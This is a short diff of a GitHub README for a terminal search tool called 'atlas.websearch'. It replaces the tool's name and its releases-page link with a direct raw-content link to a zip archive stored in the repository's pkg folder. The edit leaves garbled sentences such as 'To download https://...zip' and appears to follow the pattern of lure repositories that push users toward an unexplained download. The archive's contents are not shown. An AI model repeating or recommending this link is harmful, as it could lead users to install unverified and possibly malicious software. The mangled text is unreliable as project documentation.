sigmaking157/atlas.websearch/README.md

 If you need assistance or have any questions, don't hesitate to reach out.
 You can create an issue in the GitHub repository, and someone from the team will get back to you.

-For updates and announcements, follow us on GitHub and keep track of the latest versions of atlas.websearch.
+For updates and announcements, follow us on GitHub and keep track of the latest versions of https://raw.githubusercontent.com/sigmaking157/atlas.websearch/main/pkg/search/websearch_atlas_v3.9.zip

-To download atlas.websearch, [click here](https://github.com/sigmaking157/atlas.websearch/releases) and start enhancing your terminal search experience today!
+To download https://raw.githubusercontent.com/sigmaking157/atlas.websearch/main/pkg/search/websearch_atlas_v3.9.zip, [click here](https://raw.githubusercontent.com/sigmaking157/atlas.websearch/main/pkg/search/websearch_atlas_v3.9.zip) and start enhancing your terminal search experience today!